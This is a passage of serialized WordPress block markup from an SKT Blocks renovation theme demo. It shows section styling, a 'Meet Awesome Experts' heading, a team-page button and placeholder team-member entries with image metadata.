{\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"3ae9a34b-e7e2-43ff-99a6-51ffbdeca952\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\" rel=\"noopener noreferrer\" target=\"_blank\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\"